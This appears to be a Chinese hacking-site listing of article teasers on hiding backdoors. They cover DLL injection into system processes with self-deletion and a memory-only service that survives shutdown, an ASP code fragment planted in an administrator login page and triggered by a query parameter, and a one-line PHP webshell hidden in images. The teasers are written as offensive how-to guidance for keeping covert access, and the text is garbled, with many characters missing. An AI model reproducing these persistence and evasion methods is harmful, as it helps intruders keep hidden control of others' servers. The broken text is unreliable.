来源:安全中国个不错思路隐藏后门利用线程注射DLL到系统进程解除DLL映射并删除自身DLL和EXE文件删除自身创建服务仅仅存在于内存中于是在寄主机器上无法找到任何新增服务项磁盘文件或者是进程空间里不明DLL关机时该会截获关机在系统关闭的前恢复自己缺点是不正常重启的后后门消失..... 以下代码引自byshell0.67你可以从Xfocus上获取源代码(baiyuanfan大侠作品撒～)直没看过后门... [阅读全文]

利用:安全中国今天说是在管理员后台登陆界面隐藏我们后门这是相对比较安全管理员入口不是 经常换只要他登陆界面在我们后门就在！ 1.从我们SHELL上找到管理员入口页面 2.编辑它 在最后面写上段代码 % request.QueryString("action")="comeon" then a=Request.TotalBytes: a Then b="adodb.stream":... [阅读全文]

最近很多朋友都在问我是否能把我那句话木马隐藏到HTML或图片里其实把句话木马插入到PHP文件中就已经很隐蔽了如果说硬是要放到HTML文件或图片里就接着往下看这篇篇测试报告吧要知道如果光把PHP语句放到图片里是无论如何也不能执行PHP只解析扩展名为php文件所以说要能使隐藏在图片里PHP语句执行我们就借助PHP中 : 、require 等 　　我们还记得前些日子把木马隐藏到图片文章吧也就是在PHP文... [阅读全文]

浅析后门隐藏技术经常在网上“飘”朋友相信对后门这个名称定很熟悉其实后门也是种而由于它用途原因它被广大杀毒软件Software列为“通缉犯”而且见到它便会痛下杀手使那些使用后门朋友痛心欲绝正因如此在这被杀和免杀的间后门等级得到不断提升从后门原始社会进入了后门共产主义社会(有点夸张其实个人认为共产主义社会是不可能达到；)好了回到主题:1．什么是后门 后门是种远程通信工具使用者可以利用后门来做系列事情... [阅读全文]

作者:mervin 组织:黑色反击 http://www.hf110.com 介绍说明:本文是我给黑鹰基地会员写“后门隐藏经验交流”课程整理总结专文里面所说是针对黑鹰基地 会员 大家好我首先要跟大家说声对不起啦的前我答应给大家做语音动画可是最近我白天确实没 有什么时间可以去做但是又必须尽快给大家把那天课程内容整理总结下所以就写出了这篇文希望大家谅 解 其次我还有介绍说明下在我讲完课后得到反... [阅读全文]